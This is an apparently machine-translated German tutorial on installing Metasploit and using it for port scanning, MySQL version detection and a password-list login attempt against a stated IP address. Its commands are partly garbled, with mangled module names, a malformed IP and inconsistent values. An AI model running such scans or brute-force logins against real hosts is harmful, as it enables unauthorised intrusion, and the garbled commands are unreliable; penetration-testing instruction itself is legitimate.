Metasploit-Framework zum Testen der Serversicherheit

Inhaltsverzeichnis
Metasploit-Framework, ist ein Tool zum Entwickeln und Ausführen von Exploits gegen einen Computer oder Server. Metasploit Framework wurde in der Sprache Ruby geschrieben, ist plattformübergreifend und erfordert einen leistungsstarken Computer, es gibt eine kostenpflichtige Version und eine kostenlose Version für die Community.
Es kann unter www.metasploit.com/framework/download heruntergeladen werden
Wir installieren in Linux Ubutnu, aber es funktioniert für andere Distributionen, indem es einige Befehle ändert.
Wir greifen auf das Terminalfenster zu und installieren Ruby, bevor es mit Perl funktionierte, aber komplett neu programmiert wurde.
Wir installieren die Ruby-Abhängigkeiten, damit wir dann das Framework ausführen können.
 sudo apt-get install ruby ​​libruby rdoc sudo apt-get install libyaml-ruby sudo apt-get install libzlib-ruby sudo apt-get install libopenssl-ruby sudo apt-get install libdl-ruby sudo apt-get install libreadline-ruby sudo apt -get install libiconv-ruby sudo apt-get install rubygems * sudo apt-get install libgtk2-ruby libglade2-ruby 

Dann geben wir je nach Version, die wir 32 oder 64 Bit aus dem Termink herunterladen, die Erlaubnis:
chmod + x metasploit-latest-linux-x64-installer.run

Wir führen das Installationsprogramm aus und das Installationsfenster wird geöffnet:
sudo metasploit-latest-linux-x64-installer.run

Wir werden auf den folgenden Fordward klicken), wir definieren, ob es als Dienst installiert werden soll und den Port, den es belegen wird, standardmäßig verwendet es die 3790.
Am Ende der Installation aus dem Terminalfenster und mit Root-Zugriff aktualisieren wir das Framework
mit dem Befehl:
msfupdate

Metasploit ist ein Programm ohne grafische Umgebung, das vollständig im Terminal läuft. Wir greifen vom Terminal aus mit dem Befehl auf die Software zu:
msfconsole

MSF intern kennen
MSF (Metasploit-Framework) Es gliedert sich in eine Reihe von Modulen wie:

Ausbeutung Welche Skripte und Programme sind in MSF verfügbar und können von uns verwendet werden, sie sind nach Betriebssystem und Kategorien geordnet, zum Beispiel Exploits / Windows / Browser / Welche Exploits sind für Browser verfügbar, die unter Windows ausgeführt werden.

Nutzlasten: Es ist die Aktion, die ausgeführt wird, wenn die von uns getestete Schwachstelle gefunden und ausgenutzt werden kann.

Hilfs: die hilfsskripte mit unterschiedlichen funktionen, wie hilfs/scanner/portscan/tcp und mit diesem tcp-portscanner würden wir den portstatus erhalten. Dieses Skript ist eine Alternative zu Nmap.

Geber: Sie codieren Skripte, um Antiviren- und Spammer-Schutz zu umgehen.

Wir starten ein Testbeispiel von dem Terminal aus, das wir ausführen:
./msfconsole

Die Metsploit-Eingabeaufforderung ist msf> von dort aus werden wir alles ausführen und zum Beenden einfach exit eingeben
Wir beginnen mit dem Scannen einer IP mit nmap
msf> nmap -sV 190.155.80.110

Wir aktivieren das Hilfsmodul, um auf die Skript-Tools zuzugreifen, die die Arbeit an mysql ermöglichen. Wir können auch die Version des Moduls sehen.

Wir scannen die Version von mysql, aus offensichtlichen Gründen ist die IP fiktiv und nur für das Beispiel:
 msf> hilf (mysql_version)> setze RHOSTS 190.155.80.110 // setze die Remote-IP msf> setze RHOSTS 192.155.80.110 msf> hilf (mysql_version)> starte // prüfe die mysql-Version 

Wenn es korrekt ausgeführt wird, kann es die MySQL-Version zurückgeben:
[*] 190.155.80.110 läuft Mysql5.0

Ein weiterer Fall mit dem Scan-Modul und dem Versuch, den Root-Benutzer von mysql zu ändern:
 msf> use scanner / mysql / mysql_login msf> set USERNAME admin msf> set PASS_FILE /tmp/keys.lst // Textdatei mit möglichen Schlüsseln untereinander msf> Exploit 

Wenn es funktioniert, können wir uns in mysql einloggen:
mysql -h 1920,155,80,110 -u admin -pkey

Sie werden die Entwicklung der Website helfen, die Seite mit Ihren Freunden teilen

wave wave wave wave wave